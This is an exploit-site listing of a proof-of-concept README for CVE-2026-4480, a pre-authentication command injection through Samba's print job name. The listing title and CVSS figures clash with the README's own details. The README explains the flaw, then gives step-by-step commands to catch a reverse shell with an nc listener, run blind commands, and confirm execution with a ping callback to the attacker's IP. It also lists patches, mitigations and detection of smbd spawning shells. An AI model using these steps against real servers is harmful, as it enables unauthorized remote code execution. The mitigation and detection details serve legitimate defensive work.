Exploit for OS Command Injection in Redhat Openshift_Container_Platform CVE-2026-4480

Name: Exploit for OS Command Injection in Redhat Openshift_Container_Platform CVE-2026-4480
Rating: 5 (2 reviews)
2026-06-05 | CVSS 9.8
## https://sploitus.com/exploit?id=EE29DB8D-5AE5-592F-A339-029BD56A1367
# CVE-2026-4480: Samba print-command (`%J`) injection PoC

> **Important — Read this first:**  
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.

Unauthenticated remote command execution in Samba's print subsystem. When a print
job finishes spooling, Samba runs the configured `print command` through `system()`,
substituting `%s` (spool file path) and `%J` (client-supplied job name) into the
string. Before the fix the job name was passed in with the single transformation
`'` → `_` and nothing else, so `|`, `;`, `&`, spaces, `` and backticks all reach
the shell. A `print command` that references `%J` is therefore a shell-injection sink,
and since guests may submit print jobs, the issue is **pre-auth**.

- **CVE:** CVE-2026-4480
- **CVSS:** 10.0
- **Fixed in:** Samba 4.22.10, 4.23.8, 4.24.3
- **Affected:** print backends running an external `print command` that references `%J`
  (`printing = sysv`-style). `printing = cups` / `iprint` go through the CUPS API and
  are **not** affected.

## Requirements

- Linux with the Samba Python bindings:
  ```bash
  sudo apt install python3-samba
  ```
- Network access to the target's SMB port (445/139).
- A **guest-accessible printer share** on the target whose `print command` references `%J`.

## Usage

```
python3 exploit.py    [-P PRINTER] [-c CMD]
```

| Arg / option    | Meaning                                             |
| --------------- | --------------------------------------------------- |
| `rhost`         | Target Samba host / IP                              |
| `lhost`         | Your listener IP                                    |
| `lport`         | Your listener port                                  |
| `-P, --printer` | Guest printer share name (default: `HP-Reception`)  |
| `-c, --cmd`     | Run an arbitrary command instead of a reverse shell |

### Reverse shell

```bash
# terminal 1: listener
nc -lvnp 4444

# terminal 2: fire the exploit
python3 exploit.py 10.129.244.177 10.10.14.100 4444
```

You should catch a shell as the print service account (e.g. `nobody`).

### Run a single command (blind)

```bash
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'
```

Because execution is blind (the command runs server-side and returns nothing on the
RPC channel), confirm it out of band first, e.g. an ICMP callback you watch with
`tcpdump -ni tun0 icmp`:

```bash
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'
```

## Detection / mitigation

- Patch to 4.22.10 / 4.23.8 / 4.24.3 (or later).
- If you cannot patch, quote the macro: `print command = /usr/local/bin/print-helper %s '%J'`,
  drop `%J`, or move to `printing = cups`.
- Hunt for `smbd` spawning shells (`sh`/`bash`/`nc`/`python`/`curl`) and document names
  containing shell metacharacters.

## Practice on HackTheBox

I have created a box on **HackTheBox** called [Abducted](https://app.hackthebox.com/machines/Abducted) to showcase the vulnerability and give you a hands on example of how attackers could leverage this in a misconfigured environment.